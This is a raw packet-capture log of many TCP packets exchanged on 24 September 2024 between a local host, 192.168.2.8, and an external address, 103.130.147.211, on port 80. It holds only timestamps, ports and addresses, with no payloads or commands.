                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787467957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787473917 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787492990 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787509918 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787537098 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787549019 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787561893 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787576914 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787576914 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787590981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787599087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787606001 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787620068 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787645102 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787646055 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787662029 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787683964 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787712097 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787740946 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787755966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787769079 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787780046 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787813902 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787836075 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787848949 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787863016 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787877083 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787889957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787936926 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787946939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787955999 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787955999 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787969112 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787983894 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.787990093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788013935 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788017035 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788027048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788039923 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788039923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788053989 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788055897 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788083076 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788084030 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788093090 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788100004 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788108110 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788141012 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788198948 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788213968 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788227081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788239002 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788240910 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788270950 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788297892 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788299084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788311958 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788324118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788336992 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788347960 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788350105 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788378954 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788386106 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788398981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788407087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788412094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788450956 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788467884 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788469076 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788480997 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788494110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788505077 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788523912 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788542986 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788573027 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788587093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788599968 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788611889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788613081 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788625956 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788630962 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788640022 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788666010 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788686991 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788727999 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788742065 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788755894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788767099 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788777113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788784981 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788790941 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788805962 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788829088 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788866043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788881063 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788902044 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788916111 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788923979 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788930893 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788940907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.788970947 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789011002 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789031982 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789046049 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789060116 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789073944 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789073944 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789086103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789092064 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789135933 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789160013 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789174080 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789186001 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789199114 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789199114 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789213896 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789227009 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789230108 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789279938 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789304972 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789316893 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789330006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789341927 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789344072 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789375067 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789381027 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789388895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789402008 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789414883 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789429903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789436102 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789460897 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.789483070 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790086031 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790132999 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790147066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790158987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790172100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790185928 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790196896 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790203094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790215969 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790237904 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790287018 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790328979 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790363073 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790422916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790437937 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790452003 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790463924 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790477037 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790487051 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790492058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790514946 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790529013 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790541887 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790545940 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790558100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790570021 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790577888 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790602922 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790618896 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790641069 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790652990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790667057 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790684938 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790688992 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790698051 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790700912 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.790771961 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812294006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812308073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812320948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812359095 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812374115 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812386990 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812400103 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812403917 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812403917 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812414885 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812460899 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.812490940 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814136982 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814160109 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814172983 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814186096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814201117 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814214945 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814256907 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814266920 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814281940 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814331055 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814332962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814380884 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.814380884 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818890095 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818917990 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818933010 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818953037 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818967104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818979979 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.818993092 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819014072 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819014072 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819031000 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819045067 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819060087 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819075108 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819075108 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819077969 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819093943 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819104910 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819109917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819123030 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819173098 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819173098 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819221973 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819236040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819248915 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819289923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819291115 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819303989 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819319010 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819331884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819353104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819367886 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819380999 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819391012 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819391012 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819410086 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819422960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819437027 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819438934 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819454908 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819474936 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819489956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819500923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819500923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819504976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819539070 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819542885 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819542885 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819552898 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819567919 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819583893 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819616079 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819626093 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819631100 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819645882 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819679976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819690943 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819690943 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819694042 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819710970 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819726944 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819729090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819761992 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819791079 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819798946 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819813013 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819827080 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819840908 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819886923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.819886923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820884943 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820898056 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820911884 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820924997 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820938110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820951939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820952892 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:33.820967913 CEST8049735103.130.147.211192.168.2.8
